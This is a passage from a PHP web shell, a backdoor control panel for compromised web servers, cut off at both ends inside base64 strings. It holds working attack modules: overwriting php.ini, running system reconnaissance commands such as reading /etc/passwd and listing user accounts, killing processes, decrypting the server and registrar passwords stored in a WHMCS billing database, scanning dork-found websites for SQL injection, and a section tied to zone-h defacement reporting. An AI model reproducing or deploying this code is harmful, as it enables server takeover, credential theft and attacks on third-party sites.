JvLmRlZmF1bHR0aW1lb3V0ID0gMzANCmRhdGUudGltZXpvbmU9IkFzaWEvS3VhbGFfTHVtcHVyIg0KZXh0ZW5zaW9uPXBkby5zbw0KZXh0ZW5zaW9uPXBkb19zcWxpdGUuc28NCmV4dGVuc2lvbj1zcWxpdGUuc28NCmV4dGVuc2lvbj1wZG9fbXlzcWwuc28NCnplbmRfZXh0ZW5zaW9uPSIvdXNyL2xvY2FsL1plbmQvbGliL0d1YXJkLTUuNS4wL3BocC01LjMueC9aZW5kR3VhcmRMb2FkZXIuc28i";
  2410.  
  2411. if ($_POST['dsmsubmit'])
  2412. {
  2413.  if(file_exists($dirphpini."php.ini")) { unlink("php.ini"); }
  2414.  $fse=fopen("$dirphpini$phpininamelol","w");
  2415.  fwrite($fse, base64_decode($dataphpini));
  2416.  fclose($fse);
  2417.  if($fse){ echo "Successfull !"; }else{ echo "Failed, Maybe not Writable ?  :s"; }
  2418. }
  2419. }  
  2420.  
  2421. elseif(isset($_GET['x']) && ($_GET['x'] == 'process'))
  2422. {  
  2423. ?>
  2424. <form action="?y=<?php echo $pwd; ?>&amp;x=process" method="post">
  2425.  
  2426. <?php
  2427.  
  2428. function processc99() {
  2429.  if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");}
  2430.  else {$handler = "tasklist";}
  2431.  $ret = myshellexec($handler);
  2432.  if (!$ret) {echo "Can't execute \"".$handler."\"!";}
  2433.  else
  2434.  {
  2435.   if (empty($processes_sort)) {$processes_sort = $sort_default;}
  2436.   $parsesort = parsesort($processes_sort);
  2437.   if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
  2438.   $k = $parsesort[0];
  2439.   $ret = htmlspecialchars($ret);
  2440.   if (!$win)
  2441.   {
  2442.    if ($pid)
  2443.    {
  2444.     if (is_null($sig)) {$sig = 9;}
  2445.     echo "Sending signal ".$sig." to #".$pid."... ";
  2446.     if (posix_kill($pid,$sig)) {echo "OK.";}
  2447.     else {echo "ERROR.";}
  2448.    }
  2449.    while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
  2450.    $stack = explode("\n",$ret);
  2451.    $head = explode(" ",$stack[0]);
  2452.    unset($stack[0]);  
  2453.    $prcs = array();
  2454.    foreach ($stack as $line)
  2455.    {
  2456.     if (!empty($line))
  2457. {
  2458.  echo "<tr>";
  2459.      $line = explode(" ",$line);
  2460.      $line[10] = join(" ",array_slice($line,10));
  2461.      $line = array_slice($line,0,11);
  2462.      $prcs[] = $line;
  2463.      echo "</tr>";
  2464.     }
  2465.    }
  2466.   }
  2467.   else
  2468.   {
  2469.    while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
  2470.    while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
  2471.    while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
  2472.    while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
  2473.    while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
  2474.    while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
  2475.    while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
  2476.    while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
  2477.    while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
  2478.    while (ereg("",$ret)) {$ret = str_replace("","",$ret);}
  2479.    while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
  2480.    $ret = convert_cyr_string($ret,"d","w");
  2481.    $stack = explode("\n",$ret);
  2482.    unset($stack[0],$stack[2]);
  2483.    $stack = array_values($stack);
  2484.    $head = explode("",$stack[0]);
  2485.    $head[1] = explode(" ",$head[1]);
  2486.    $head[1] = $head[1][0];
  2487.    $stack = array_slice($stack,1);
  2488.    unset($head[2]);
  2489.    $head = array_values($head);
  2490.    if ($k > count($head)) {$k = count($head)-1;}
  2491.    $prcs = array();
  2492.    foreach ($stack as $line)
  2493.    {
  2494.     if (!empty($line))
  2495.     {
  2496.      echo "<tr>";
  2497.      $line = explode("",$line);
  2498.      $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]);
  2499.      $line[2] = intval(str_replace(" ","",$line[2]))*1024;  
  2500.      $prcs[] = $line;
  2501.      echo "</tr>";
  2502.     }
  2503.    }
  2504.   }
  2505.   $head[$k] = "<b>".$head[$k]."</b>".$y;
  2506.   $v = $processes_sort[0];
  2507.   if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);}
  2508.   $tab = array();
  2509.   $tab[] = $head;
  2510.   $tab = array_merge($tab,$prcs);
  2511.   echo "<TABLE height=1 cellSpacing=0 cellPadding=5 width=\"100%\" border=1>";
  2512.   foreach($tab as $i=>$k)
  2513.   {
  2514.    echo "<tr>";
  2515.    foreach($k as $j=>$v) {
  2516.    if ($win and $i > 0 and $j == 2) {
  2517.    $v = view_size($v);
  2518.    }
  2519.    
  2520.    echo "<td>".$v."</td>";}
  2521.    echo "</tr>";
  2522.   }
  2523.   echo "</table>";
  2524.  }
  2525. }
  2526.  
  2527. echo "<center><br><br>";
  2528.     if($win) {
  2529.     echo "<form method='post'>
  2530.     <select class='inputz' name='windowsprocess'>
  2531.     <option name='systeminfo'>System Info</option>
  2532.     <option name='active'>Active Connections</option>
  2533.     <option name='runningserv'>Running Services</option>
  2534.     <option name='useracc'>User Accounts</option>
  2535.     <option name='showcom'>Show Computers</option>
  2536.     <option name='arptab'>ARP Table</option>
  2537.     <option name='ipconf'>IP Configuration</option>
  2538.     </select>
  2539.     <input type='submit' class='inputzbut' name='submitwinprocess' value='View'>
  2540.     </form>
  2541.     ";
  2542.     } else {
  2543.     echo "<form method='post'>
  2544.     <select class='inputz' name='nonwindowsprocess'>
  2545.     <option name='processsta'>Process status</option>
  2546.     <option name='syslog'>Syslog</option>
  2547.     <option name='resolv'>Resolv</option>
  2548.     <option name='hosts'>Hosts</option>
  2549.     <option name='passwd'>Passwd</option>
  2550.     <option name='cpuinfo'>Cpuinfo</option>
  2551.     <option name='version'>Version</option>
  2552.     <option name='sbin'>Sbin</option>
  2553.     <option name='interrupts'>Interrupts</option>
  2554.     <option name='lsattr'>lsattr</option>
  2555.     <option name='uptime'>Uptime</option>
  2556.     <option name='fstab'>Fstab</option>
  2557.     <option name='hddspace'>HDD Space</option>
  2558.     </select>
  2559.     <input type='submit' class='inputzbut' name='submitnonwinprocess' value='View'>
  2560.     </form>
  2561.     ";
  2562.     }
  2563.    
  2564.     $windowsprocess = $_POST['windowsprocess'];
  2565.     $nonwindowsprocess = $_POST['nonwindowsprocess'];
  2566.    
  2567.     if ($windowsprocess=="System Info") $winruncom = "systeminfo";
  2568.     if ($windowsprocess=="Active Connections") $winruncom = "netstat -an";
  2569.     if ($windowsprocess=="Running Services") $winruncom = "net start";
  2570.     if ($windowsprocess=="User Accounts") $winruncom = "net user";
  2571.     if ($windowsprocess=="Show Computers") $winruncom = "net view";
  2572.     if ($windowsprocess=="ARP Table") $winruncom = "arp -a";
  2573.     if ($windowsprocess=="IP Configuration") $winruncom = "ipconfig /all";
  2574.     if ($nonwindowsprocess=="Process status") $systeminfo = "ps aux";
  2575.     if ($nonwindowsprocess=="Syslog") $winruncom = "cat  /etc/syslog.conf";
  2576.     if ($nonwindowsprocess=="Resolv") $winruncom = "cat  /etc/resolv.conf";
  2577.     if ($nonwindowsprocess=="Hosts") $winruncom = "cat /etc/hosts";
  2578.     if ($nonwindowsprocess=="Passwd") $winruncom = "cat /etc/passwd";
  2579.     if ($nonwindowsprocess=="Cpuinfo") $winruncom = "cat /proc/cpuinfo";
  2580.     if ($nonwindowsprocess=="Version") $winruncom = "cat /proc/version";
  2581.     if ($nonwindowsprocess=="Sbin") $winruncom = "ls -al /usr/sbin";
  2582.     if ($nonwindowsprocess=="Interrupts") $winruncom = "cat /proc/interrupts";
  2583.     if ($nonwindowsprocess=="lsattr") $winruncom = "lsattr -va";
  2584.     if ($nonwindowsprocess=="Uptime") $winruncom = "uptime";
  2585.     if ($nonwindowsprocess=="Fstab") $winruncom = "cat /etc/fstab";
  2586.     if ($nonwindowsprocess=="HDD Space") $winruncom = "df -h";
  2587.    
  2588.  
  2589.     if (isset($winruncom)) {
  2590.     echo "<table class='cmdbox'>
  2591.     <tbody><tr>
  2592.     <td colspan='2'>
  2593.     <textarea class='output' name='content'>".exe($winruncom)."</textarea>
  2594.     </td></tr></table></center>";
  2595.     }
  2596.    
  2597.     if (isset($systeminfo)) {
  2598.         echo "<br><br>";
  2599.         processc99();
  2600.     }
  2601.  
  2602. }
  2603.  
  2604. elseif(isset($_GET['x']) && ($_GET['x'] == 'whmcs'))
  2605. {  
  2606. ?>
  2607. <form action="?y=<?php echo $pwd; ?>&amp;x=whmcs" method="post">
  2608.  
  2609. <?php
  2610.  
  2611. function decrypt ($string,$cc_encryption_hash)
  2612. {
  2613.     $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
  2614.     $hash_key = _hash ($key);
  2615.     $hash_length = strlen ($hash_key);
  2616.     $string = base64_decode ($string);
  2617.     $tmp_iv = substr ($string, 0, $hash_length);
  2618.     $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
  2619.     $iv = $out = '';
  2620.     $c = 0;
  2621.     while ($c < $hash_length)
  2622.     {
  2623.         $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
  2624.         ++$c;
  2625.     }
  2626.     $key = $iv;
  2627.     $c = 0;
  2628.     while ($c < strlen ($string))
  2629.     {
  2630.         if (($c != 0 AND $c % $hash_length == 0))
  2631.         {
  2632.             $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
  2633.         }
  2634.         $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
  2635.         ++$c;
  2636.     }
  2637.     return $out;
  2638. }
  2639.  
  2640. function _hash ($string)
  2641. {
  2642.     if (function_exists ('sha1'))
  2643.     {
  2644.         $hash = sha1 ($string);
  2645.     }
  2646.     else
  2647.     {
  2648.         $hash = md5 ($string);
  2649.     }
  2650.     $out = '';
  2651.     $c = 0;
  2652.     while ($c < strlen ($hash))
  2653.     {
  2654.         $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
  2655.         $c += 2;
  2656.     }
  2657.     return $out;
  2658. }
  2659.  
  2660. echo "
  2661. <br>
  2662. <center>
  2663. <br>
  2664.  
  2665. <FORM action=''  method='post'>
  2666. <input type='hidden' name='form_action' value='2'>
  2667. <br>
  2668. <table class='tabnet'>
  2669. <tr><th colspan='2'> WHMCS Decoder </th></tr>
  2670. <tr><td>db_host </td><td><input type='text' size='30' class='inputz' name='db_host' value='localhost'></td></tr>
  2671. <tr><td>db_username </td><td><input type='text' class='inputz' size='30' name='db_username' value=''></td></tr>
  2672. <tr><td>db_password</td><td><input type='text' class='inputz' size='30' name='db_password' value=''></td></tr>
  2673. <tr><td>db_name</td><td><input type='text' size='30' class='inputz' name='db_name' value=''></td></tr>
  2674. <tr><td>cc_encryption_hash</td><td><input type='text' class='inputz' size='30' name='cc_encryption_hash' value=''></td></tr>
  2675. </table>
  2676. <br>
  2677. <INPUT type='submit' class='inputzbut' value='Submit' name='Submit'>
  2678. </FORM>
  2679. </center>";
  2680.  
  2681.  if($_POST['form_action'] == 2 )
  2682.  {
  2683.  //include($file);
  2684.  $db_host=($_POST['db_host']);
  2685.  $db_username=($_POST['db_username']);
  2686.  $db_password=($_POST['db_password']);
  2687.  $db_name=($_POST['db_name']);
  2688.  $cc_encryption_hash=($_POST['cc_encryption_hash']);
  2689.  
  2690.  
  2691.  
  2692.     $link=mysql_connect($db_host,$db_username,$db_password) ;
  2693.         mysql_select_db($db_name,$link) ;
  2694. $query = mysql_query("SELECT * FROM tblservers");
  2695. while($v = mysql_fetch_array($query)) {
  2696. $ipaddress = $v['ipaddress'];
  2697. $username = $v['username'];
  2698. $type = $v['type'];
  2699. $active = $v['active'];
  2700. $hostname = $v['hostname'];
  2701. echo("<center><table border='1'>");
  2702. $password = decrypt ($v['password'], $cc_encryption_hash);
  2703. echo("<tr><td>Type</td><td>$type</td></tr>");
  2704. echo("<tr><td>Active</td><td>$active</td></tr>");
  2705. echo("<tr><td>Hostname</td><td>$hostname</td></tr>");
  2706. echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
  2707. echo("<tr><td>Username</td><td>$username</td></tr>");
  2708. echo("<tr><td>Password</td><td>$password</td></tr>");
  2709.  
  2710. echo "</table><br><br></center>";
  2711. }
  2712.  
  2713.     $link=mysql_connect($db_host,$db_username,$db_password) ;
  2714.         mysql_select_db($db_name,$link) ;
  2715. $query = mysql_query("SELECT * FROM tblregistrars");
  2716. echo("<center>Domain Reseller <br><table border='1'>");
  2717. echo("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>");
  2718. while($v = mysql_fetch_array($query)) {
  2719. $registrar     = $v['registrar'];
  2720. $setting = $v['setting'];
  2721. $value = decrypt ($v['value'], $cc_encryption_hash);
  2722. if ($value=="") {
  2723. $value=0;
  2724. }
  2725. $password = decrypt ($v['password'], $cc_encryption_hash);
  2726. echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");
  2727. }
  2728. }
  2729. }
  2730. elseif(isset($_GET['x']) && ($_GET['x'] == 'sqli-scanner'))
  2731. {  
  2732. ?>
  2733. <form action="?y=<?php echo $pwd; ?>&amp;x=sqli-scanner" method="post">
  2734.  
  2735. <br><br>
  2736. <center>
  2737. <form method="post">
  2738. <font color="red">Dork :</font>
  2739. <input type="text" name="dork" class="inputz" size="20"/>
  2740. <input type="submit" class="inputzbut" name="scan" value="Scan">
  2741. </form>
  2742. </center>
  2743.  
  2744. <?php
  2745.  
  2746. if (isset($_POST['dork']) && !empty($_POST['dork'])) {
  2747.  
  2748.     $browser = $_SERVER['HTTP_USER_AGENT'];
  2749.  
  2750.     $first = "startgoogle.startpagina.nl/index.php?q=";
  2751.     $sec = "&start=";
  2752.     $reg = '/<p class="g"><a href="(.*)" target="_self" onclick="/';
  2753.  
  2754.     for($id=0 ; $id<=30; $id++){
  2755.         $page=$id*10;
  2756.         $dork=urlencode($_POST['dork']);
  2757.         $url = $first.$dork.$sec.$page;
  2758.  
  2759.         $curl = curl_init($url);
  2760.         curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  2761.         curl_setopt($curl,CURLOPT_USERAGENT,'$browser)');
  2762.         $result = curl_exec($curl);
  2763.         curl_close($curl);
  2764.  
  2765.         preg_match_all($reg,$result,$matches);
  2766.     }
  2767.    
  2768.     foreach($matches[1] as $site){
  2769.  
  2770.         $url = preg_replace("/=/", "='", $site);
  2771.         $curl=curl_init();
  2772.         curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  2773.         curl_setopt($curl,CURLOPT_URL,$url);
  2774.         curl_setopt($curl,CURLOPT_USERAGENT,'$browser)');
  2775.         curl_setopt($curl,CURLOPT_TIMEOUT,'5');
  2776.         $GET=curl_exec($curl);
  2777.         if (preg_match("/error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch&#8203;_row()|SELECT * FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i",$GET)) {
  2778.             echo '<center><b><font color="#E10000">Found : </font><a href="'.$url.'" target="_blank">'.$url.'</a><font style="color:#FF0000"> &#60;-- SQLI Vuln Found..</font></b></center>';
  2779.         } else {
  2780.             echo '<center><font style="color:#FFFFFF"><b>'.$url.'</b></font><font style="color:#0FFF16"> &#60;-- Not Vuln</font></center>';
  2781.         }
  2782.        
  2783.         ob_flush();flush();
  2784.     }
  2785. }
  2786. }
  2787.  
  2788. elseif(isset($_GET['x']) && ($_GET['x'] == 'zone-h')){  ?>
  2789. <form action="?y=<?php echo $pwd; ?>&amp;x=zone-h" method="post">
  2790. <br><br><? echo '<p style="text-align: center;"> <img alt="" src="data:image/gif;base64,R0lGODlhBQFDAPcAAPr6+vjv71pXWLpnZ1MBAZ6dnf39/ZMBAGQBAf4eHtTU1L0AALw0NLkAAdy8vP44OKwTE0wXF8cBAjwiIrpFRVRDQ6ECALQhIbSBgZtCQsQXF4wAAK4AAdKOjtvb27ITE1gYGJYoKKlHR7l0dK4dHfLy8pQyMtiqqkpJSbq6uv1NTbouLggFBbuRkWMXF70lJcVSUlg1NaUuLaYAAIMBAMAAAFIsLPX19UwnJyoBAYWCg6oAAMVnZzEKCuDg4MO4uBwbHMV/f4Q1Ne7u7ioaGszMzOfAwK0MDL07O8hYWeXNzciennsAALQAAHIWFrhTVMl0dOcCAnQAAKyrq0YDA6eIiIgiIpYYGJiGht+Ojp51dcPDw50AAP0ICMBCQjcWFrOzsyQiIr4UFNNISD47PNNXV97IyMNLS5gAADMyMuzf38IkJKt1derq6rwcHM48PLwMDLMMDMnHx6UMDPPf38uvr3orK2QsLM5JSiwrK7IrKmdkZcMsLHViY6k2NrIBANh9fENBQdqfn2shIaZgYHg5OUw2NosTFKSWlsszM3d0dcpVVebm5stBQbAAAGo6O7YBAKWlpcVdXbQ9PV8gIMolJcQzM8A9PoMKCXoMDA8PD+OwsKkGBtwCAs0sLMANDdVgYK4EBbUxMBsICKyhobkFBV5QUElERN3S0vDPzyYlJb4EBLqgoLQPD41ERB4TE6YEBPHm5tkZGc8CArYYGLEFBco3ODc1NbwQEJUJCctGR68QD7oXF7MXF7gnJ20pKZ8QEIcGBWsJCcQFBbQFBcAHB7oZGKUICF4ODsJHR7ACApwGBqMGBJGPkOTj46sJCLwDBConKLwICMEQEMYHB1JQUKsDA4oKCuMqKrcBALQDA8EBALMBAYMPD5M/P9BPUN5TU8MvL7tOTsMeHrAICNq/v744Obs3N5CBgVA+Pr4gIKYCArcJCTEuLrlvb8cwMM5YWVEODXNtbncGBsQoJ3oQEDo4OP4CAqwAAKQAAMQAASMfIMIAAMgAAP///wAAACH5BAAAAAAALAAAAAAFAUMAAAj/APsJHEiwoMGB/Bb8mYHmAA0mUiJKZMKExgEuO/404Hewo8ePIEOKHEmypMmTKFOqXDlQ3wJHXDZAFEKoRbly/nLqvBmEkJUNaPI5WsCRpdGjSJMqXcrUJL8GOw4wqUdoSQCdWLNiVSPoyUV8G5uKHUu2rNmj+hrM2CBFiFWsAOrU2eJhCAADWv1l2eQvQAcSXPARPUu4sOHDISUoXsy4sYQF+A5IcYUTK982QcZIalGE0V2tAQQ1ApXKn6AQXJQt0Oe4tevXsGPLnk27tu3buHPr3r1YXzYuNKzU0WngRok2APwB8GHLkyceqG7gzesPEC4YVzsAm9FAH2ve4MOL/x9PPjyXQzLSq9dTbIFu7/Djx6/BQSqbq/48pPhhxocDJcmVAIgG02zTSlYGAJCcTnR0oJMa4ljQRA3yVWjhhRhmqOGGHHbo4YcghqghFySo8MCJJyYwiwYicrjADhvUc4I/qCwBRgHuJCKIAYIkktMQcrCIBiFZAVBCCQvmFMAmdOjUgQVD8dPilFRWaeWVWGLIBS8J3OOll1HMUUmW8S0wAw0m0GEAK6B8MwAGY2RzFQDf5FRCERo0cUiTcAEASF745ZQKBBwQReahiCaqqIhbdvnlPVEcMSaZ2zSQD5oBMIIBKGM4Nw4kh9iZihHKeZDIDhlQR50CBTRTQDmp0P8hikbbLGrrrbgiyoUxjn4Z5qQh8iPssMLWYCYNRHowAji2aEDNAhZ0o0ZOsYCiUwlZcOGOqlk5I0AY+4S7DyWbBLBCEwvUQOy67Lbr7rvwxivvvPTWa++9+Arb6KOQipnvu8eaQCMP33jCYhNoSLFETgYsiVUAkgTBrU4KtCNuuGGoMoEgAYSTTbr/hizyyCSXbPK6+z7668k14LOBEFdl5skn/DQhGQY/OpMkVnxOLMDFGIPrwiap4NJADeqerPTSTDedb8q++ltyDTbXM+0WkiQyjUtcSDGccnK0EF1y001MMdBAA2GJGUYscLTTcMctd9NQgyk1vtvkrXcDXDD/MZwPiIxRyTDbQHIAzjm1AcYYUHjgjHRmY9UM2uICAYQMlQQASAML6O3556CHLvropJdu+umop6766qnX3W8lrIf+Ig1s+GPAFDy8oUHe2aDRcxs/eNJIOR20YUDZZk9OebhAXCFBI/40km7s1I/+hwUbbECDRRZA0nn1o0N1gPYHWPDH97E3EJn23J8P/umu/+o5JNiTP0M2NYSO9P42W3GVHGwQXDGQ9pIdKagEzoAEF/6ggVgcD3ncUt7ygJCLDnAhC3RYgAb3V4MzSQEBIAyhCEdIQhBuYAfp4qAKa7ADGiCAChHAgQ1maIMIxAMBNEDhCnfowREyIR9HYyET/wgQjwjQ0IZSQAO6dsjEBeRjiEWkYQ1vuAHBMPGKWFRh/MRkrK4RwAVWUE89hCEFCwRxfxrUoKWYsLAhkGIRWkujBvngALsYQA2DMEU6lgGFu0BQVQpYHvO84I9NhIAOgJCjBtFAiQo48pGQjKQkHzmBDShSkfmQAgFwUIE9VCMQZEjDLW5BBhScwgbIoAEQL6lIRkoSBwhYQBNosElTCAAFgRAlGU4RCBwwgTusvGQmqWADW+JSlKQ8xSlTKZhgOvOZaUQDl/j1qxlo0gTgUIGJUKSCN0CABjMIZhM24I2cFAEDbxjHKuTYgCa0wgglaIY9yBCIaNRjHHQIVOR+Rv85IOyBL33pyzRaGYE0WO6gCE2oQg/6jyt8gpWzJIANBFCNdmjiHxjNKEZZAIQ0oFKJz0RDQRP6D2QsQAoRoGgeLqrRf7BgH+0QBhc+5swGHECit1QFS1vK0TTgYB6rhKZQWzlNlc2hGAiwgzYT0AV+3SMBCcDGMsKpSLUwoTJbGMA7BqpBbszAIfMoxCmAFoEZPCFyWHGGxdLWDndATyc3gMI25ChSILT0rni9awgeqsg/SCEepkCBKliQV42yQBOqiEAVnVnXuyJjAzgQQBoIW1hNvAIBzWRlNjZAgApUIwyULexhwyBT7w31tNLsFZiosYFJmKipTv0SU0OR2a7/HsAKiQPDIiohjQV4VSrCeIQ8qrEPILwCCOGKQRD0idYS8FNciqgDHxYwJwWhQgx0jYBdC8tdjYaAq2nkBkoFcIuddnejr/jCYlnZ2JYSgBLVUMV5XcoCLnAjmJw1RSDM211NaAIBwDytUFPLry5EoRIqUG1svWTgP5hWgy1cWH5Ikc4FKAMNTAiuPARgD+MCoRBX2Icq9qAT5kbOGVNoRgpKYIAhAGIGO3LcceDRnkVqd77d3Ss7mRAPAbQjtDjGqCZGgYbzXbK9Gv2CPeQbZCpw7pJcQEAFyMDf87KABUywhoAHXNQvdaELUAVTJzoRhQV7qRhPXkA2LMCEOckB/wPNWvM8hMth476iEJJ4AzPSkIc0oPXPASBBEG7AiiD4wBl1EEONkRxkvWI3jTetxmQbbVgW5GAGD47mjStt3vS+QrT/aEWauyoFG5yiyhj9whdGkdcrY3rLIe2yUyWwAQQ44RDd4MIsYtuFYfBVIQcgkj+GkIIBJOITCPvFHgJR3DtL4hu2kAYwApGHffz5z0ZIhQJGgIe5gKERXM0GAs77hR4AmaeTAC8+EGAIMpx7o3fwRgYyMAhW4/XKCBgKQbd770IkoQxjGMM5elDYQ4x6AQeIx1jvyoJH/BsPeJgEwfGab1gzVta+moEwMgCPMkD8Eq3YtVNngYs0ukzCPv+YAgzoIQ0F/oLZRMAztMfxCUccIBAWa24B9rDWfZBBEc7IyxBYkQRb0AMKVdCFBjQojXE0ogxQj7rU8QAHYQDh3S4VwRt6q0EagAAFqL5DEvDwjnGMgx6JGATWr+wIdGWX3y19xRN0oc4FQOMT08hBXpEBXjWX2h7nZoEI8FD3u2uACgxnQS3cbnGiKthL3KgHPJS+zgXgfRZl5tcsPuC2NV7FAApARDqhAYl8OKHDOBiDLcYBB2iohQbpSMM+CjAxZyhCkO0oQVZuUIQRpFMMa+DBO8TQgOIb//jHXzcO4ptXbzTiE8ZvArvbgVchfGMNrjd+McQADKz/AwHKQD7/ozUqgkRIA/nSoEFe46GB4+cDAYGAO0adD/3jn1/vdxVGNpDP//73Hw208HidQAPJkAjZZ3zSgAaw9SidwHnFxwUC4w8lsAUjYAvEBxX1QAb78AX0IAaulw1RIQV9cAvgIgBBlxcSJEiKkBVDsAXuwAefAA1wIAZicH7+d3yOgFLMV326cIHFhwbIsF93dQd40H78Bw3SIAX3xgJwAAnHN34YFQGNAAdHSANEgFc9MA7HtwERYA931QON4IPHBw3zgIXTcINoyH8HgHH3AA1X0Ag2iHwbIAtOFSnGF2y5pVVUqD7BoIFAsAZwkA0gGCMYoAMkGC7tQHtphQKCdDHt/8CCWwADa3B+0FAKpdAA+4eGkMBj1ZAHeUWEboB8NIADacBwXrAGgth/pTAD+HdXh+CEd7hpLWUCfOB/B/AF79YD9HB8TIADTKZRg2AJ/lcKG/BphvUPGsANxscB+cAFzviM0AiNQpGJBxCATsUFolCL/XcAsrCAdmN8GyAx+TEFjTCJxVcffkgCRvMHkjEczVBtF2OCOVExjQg0J/gjkTgOcZiGxQcJNEAFkoZ1OHB9yJcNUoADYXBXEWALl3iDTYAMWIcMe4iJUPgPtmA02xgBVaaLxycFBqVXoeh/aICLrgiLDUADyBABKrmSLMmSyBAMGmFT1sgvB2CBtogLCv8WJuBYGQpQBbbAC8ZnczagCs0jBtlwcjkhD+HCc+KSiFNQj2gjB8TRBikAA+rQkPxYfPkFeHj1CgSJfI6AAPZQZXawBmlYCkwgfxjVA2J4ALKoUe9wg26plj1glsUXluV1VzTwQSWEAO+llk4wkUyQDtWAAoZ5mIh5mGFAADa4hjl5AMJoixink4JIAzgBANvGB7ggiNlwYZRgMU4gBgp0VT5AXOHSDCWwB8tjgs+1PLrHMM4ABslwlZxZm7bJmWhAAOlAZV0JAx5zm/kgDKV4VzLgBrdpm/64D3g1CupQm3N5V6NgCccpiM/ZUnXJmcE5nIb1BYYwSY+0cC2FDEb/WZkTgGp45QLGmQ3VmJPA8JvHuZ7UNAecSQMM4wFQ4AbSwA2QAAl/wAWDYFAugAtsJgzoQAaqEC5kcIIp0HPhggI5kYKUAxceQAq2kJ7TaZsWgAAxAHb3Jg6WUArHmQ/I4Il3ZQlNeKGVSZJ3RQ+QwJnVqVG6eKEvmlHXKYgiSqItpQkLhVCakIsa0KLZQAPliWPoSZ0zGTUvIKNHajfzqRNDsARwMAMWMAN/wA2mZw/7UFZMQAl9QF7gogOvOY9Aswe6B6FAIwBYcQMK0AKWMJ4oKog7gADLp5ZZ9wbsMJ0i+osaxQdvSp6oxqcu+pZriYrTOaODip3IoKeU9oWE/xqkQzpfRaqeS9ovjXqb8GlU2dAEs6QTANAGF0ADThAMaLAD+ZCB0UAEwUBn9hANKKAA8UQGZOoPjAg07ZACs7o8imgnvRcOraCpvvqrv7oDOpiQeOV8cQCsv5qneMUHyNqsQvqnv2qo/9ADL9Csmiqt1OqryrqoeZWtmvqsROoG1zqpYVKt1nqpUeOr9EkcgjAPe2AKmXAAaLABudQO6XBL7aAKzeAPKVBKP9MOqtmgAQuV+3CPEth7L8AO1vqrORgPnZhXQpAMYrCwTfAHyKCcd/UCbUexfoUDqGYJ0Sqo02quzYqtJDsDyECs3HpXXwCy3/qo54We45qTc0CyyP+KrnajrloRA9XAS4OwlxVwC9HQDmnAqgrgLWTgYz63Vu2Amv5QAAy6mrunAEmgDgpLsY7wj6YwaUP4DbxAsU1ADGmJV4fwB2Abp2P5hS57rSLrrSXbtjZrdXg1b3Rbt3Z7tyLArC9rnnclszZDrjW7sDjbL766AQyjJH2AXNFABjHgDSMILu2ADiWgA/sgABqogTB1mliRAlA5BUXiAUFgDFe7sJxVDe6GVwMprmDbBEygshqFDKN7rshwC3j1BXrLtnRps8Bqsr6qDUyAsS0lCm4wvMRbvMZLvMbAC3Dgq/jQiud1B+Y6uOUquIBbuKTCMCVwAjLwBchlDwLAc2H/YIJT0A6GCVMWw6BSKYFmijZkoBUA4AGsYLXcsLC5GQNCeFcT8A26K7hfgFdUcKwUywQRQLt3NQi3azNwK7gJrK5X6IoUOwM7sLELyw5r8A3wcMEYnMEZrAuqK72Be67Vyw3seL0M0wY8sAKUoLjRkAYFUAJk0A7/er4XQwbp268EqwNaoaYtwAetwA0+/MM/HGU2gALGGHcwwAdAnMRKvAPxEHj/MKVK/MO5eQqum1GT4AY/zI5wG8UibLJZzAX9e1cEoA1VqsQzgAAgQAUEAEJSQAOBUcY+/AdwzMVKzI6A+wJcbMc0K8XiyKlK4Aa0gAk9hwJycHs+l7lNua/+/6AArVmPCpDDCuAO9BAHXHzGc9qVi2AJtTDHdMwNYltlljaqUSzEgfBuX3AJ7ADHXszFq+zDHACRPMUCEBzFNBABe4AC1ZAO6TBDwoAGnfzLQOzBeMzKgBvEA5DDPMANXMAIrVkA44vISxl0JWDIBOtzeQEAzgAFvEAMf8AB+MABcswNyvBXO2idJHAAfelDUMIN2sAFE5ejPcAEXMABP8wBtHTJd2UHlgDEWpy7edzKnrwBqEYFaDADSYwGCJAO1HdYQBAGV2cMxADMv6zH8TnMdezB3OAIjpAPMnC4DKMGu+A7/pCCeyAHKLBWNPygDKoIt4qreZEgm7AL+MAQQP8RwRrtsNTnvxHwnelQAafQ0z9NSTTAARo9zvemCRNwQxHhl/HgWVWcamfACxo91VyYu1N91Rpd1V+osVc9A4jHU5rwBVKwATOw0UOEAxzaUpSABFjd1m7t1htwx2/tCHFNs1P9VZ+XpoCQDw5yAymApYgoBymgYjlhw+JCyM4AlQaLIJuwFlJACAOwC0UdAXmwdkDQDtGwoyR1CHGg0bXgCM6bUYcVDYZAQyhgueYpAivQ1lptnVwN13CL1bVAA+/GAq+QBzZEBTDkWcAr2hSgDnMd3Kwt129d1/E51fjABYJwzStwAQHgA0XQAhVwMYogByWQAq3ZDp77tPXooKr/YgAlAAyP7Q838AFx8AeOILIrawWtMNXkkA/e9w+aEAZpULR8KwRecN5Y3dow+tqsHdtXrQzcQAB5hVinUA0UlZd39QuX8NnC/eB0TdxwDbjInQ/HbDtZkQr5I